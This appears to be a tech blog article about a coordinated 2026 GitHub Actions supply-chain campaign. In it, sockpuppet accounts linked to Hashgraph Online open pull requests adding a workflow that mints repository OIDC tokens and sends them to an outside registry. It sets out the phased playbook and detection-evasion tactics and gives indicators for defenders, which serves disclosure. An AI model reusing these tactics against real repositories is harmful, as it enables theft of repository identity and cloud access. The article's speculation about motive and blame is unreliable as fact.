Everyone figured MCP repos — those buzzing hubs for AI agents and browser automation — were the safe playground for the next platform shift. Developers merging PRs left and right, building agent armies without a second thought. AI’s golden age, right? Tools like Charlotte making automation feel like magic.
But bam. This GitHub Actions supply chain attack flips the script. It’s not some lone hacker; it’s a orchestrated symphony across 250+ repositories, 64 sockpuppet accounts, five escalating phases. All funneled through one shadowy org. Suddenly, that ‘fundamental platform shift’ feels a tad precarious.
Look, a single PR to Charlotte: 28 lines, one workflow file named hol-skill-validate.yml. Quotes the README, offers to tweak the name. Harmless?
I mean, come on — who doesn’t love free CI validation?
What the Hell Is in That Workflow?
Here’s the venom: it demands id-token: write permissions. That’s minting OIDC tokens, those signed JWTs yelling, “Hey cloud, this is legit from repo X!” Fine for deployments. Absurd for ‘skill metadata validation.’
And it calls hashgraph-online/skill-publish@1c30734416d9b05948ccd7f4b3cf60baada87e9e. That action grabs your token, ships it to hol.org/registry/api/v1. Preview-upload? Defaults true. Merge it, and every push, every PR? Your repo’s identity beamed to strangers.
“The entrypoint calls getGithubOidcToken(), mints a token scoped to your repository, and passes it to uploadSkillPreviewFromGithubOidc(), which ships it to hol.org/registry/api/v1.”
No SKILL.md in Charlotte. Nothing to validate. Red flag parade.
The author? internet-dot. Created April 14, 2025. Dormant 11 months, then explodes in late March 2026. 1,599 repos, bio: “i’m just a small dot on the internet. infra and identity. open source.” Links to hol.org — Hashgraph Online, Hedera blockchain crew.
This isn’t a fanboy. It’s their op account. Merged PRs into their own repos first: standards-agent-kit, skill-publish. Built trust.
Phase by Phase: The Attack Unfolds Like a Trojan Parade
Phase 1: Infiltrate awesome-lists. 20+ PRs to awesome-ai-agents, awesome-web3, even awesome-software-supply-chain-security. Slip Hashgraph Online links in. No code. Pure name-dropping where devs hunt tools.
Detour: Bounty farming. Tiny fixes to obscure repos — ScrollView tweaks, blur validation. Profile polish: active contributor, not bot.
Phase escalation. 40+ PRs in two days: codex-plugin.json manifests into MCP heavyweights. github/github-mcp-server. microsoft/playwright-mcp. cloudflare/mcp-server-cloudflare. Hashicorp, Kubernetes, Sentry, Firecrawl, Notion. Foot in the door — metadata files, no workflows yet.
Then it ramps. Sockpuppets swarm. PRs with the killer workflow. Targeting MCP infra: exa-labs, tavily-ai, more.
internet-dot leads, but 64 accounts follow. All HOL-tied. Gists? HOL docs only. UAID specs, MCP guides.
By phase 5: Charlotte-style hits on stragglers. Workflow deploys. Tokens exfiltrated.
Scale? 250+ repos touched. That’s not a poke; it’s a siege on AI agent tooling.
And here’s my unique spin — this echoes the XZ Utils saga, but turbocharged for AI’s agent era. Remember that near-backdoor in a core Linux utils lib? One maintainer compromised over years. Here? Blockchain org weaponizes open source niceties in weeks. Prediction: if unchecked, supply chain hits like this will birth ‘agent firewalls’ — mandatory workflow scanners in every org. AI’s shift demands it.
HOL’s PR spin? “Contributing to open source.” Please. President’s the sole public member. Sockpuppets don’t lie.
But — wild thought — is Hashgraph Online the villain, or pawn? Hedera ecosystem’s quiet. Smells like deeper blockchain turf war spilling into dev tools.
How Did They Dodge Detection?
Sneaky as a fox in a henhouse. Start with legit-ish contribs to own repos. Profile glow-up via bounties. Target lists devs trust: awesomes, MCP directories.
Manifests first — static, low risk. Then workflows with innocent names: ‘skill validate.’ Permissions scoped minimal at first glance.
Sockpuppets scatter: diverse bios, timed bursts. Two-week window. Dormant phases.
Search string: that action hash 1c30734416d9b05948ccd7f4b3cf60baada87e9e. Hunt your repos now.
Energy here — AI agents were set to swarm browsers, clouds, everything. This? A reality check. Wonder turns wary.
Why Does This Matter for AI Builders?
MCP’s exploding: servers bridging LLMs to tools. Playwright, Elasticsearch, Terraform — all agent fuel. Compromise these? Attackers wield your infra.
OIDC tokens? Gold for lateral moves. Impersonate your repo in AWS, GCP. Deploy malware. Escalate.
Bold call: this accelerates security in AI dev. Expect GitHub to tighten OIDC defaults. Repos mandating PR reviews on workflows. Tools like Dependabot on steroids for actions.
It’s the cost of the shift. Like web2’s OAuth scares birthed better auth. AI agents forge tamper-proof pipelines.
Don’t panic-merge. Review. Revoke.
🧬 Related Insights
- Read more: Grafana’s MCP Spyglass: Illuminating AI’s Black Boxes?
- Read more: The SDK That Keeps Paying Customers Unmuted, Even Mid-Flight Over the Atlantic
Frequently Asked Questions
What is a GitHub Actions supply chain attack?
It’s when bad actors sneak malicious workflows via PRs, granting them run perms to steal tokens or run code across your repos.
How do I check if my repo has this malware?
Search for action hash 1c30734416d9b05948ccd7f4b3cf60baada87e9e or hol-skill-validate.yml. Audit workflows for id-token: write.
Is Hashgraph Online behind the attack?
Evidence points to their org and accounts, but it’s a coordinated op using their tools. Check their repos too.
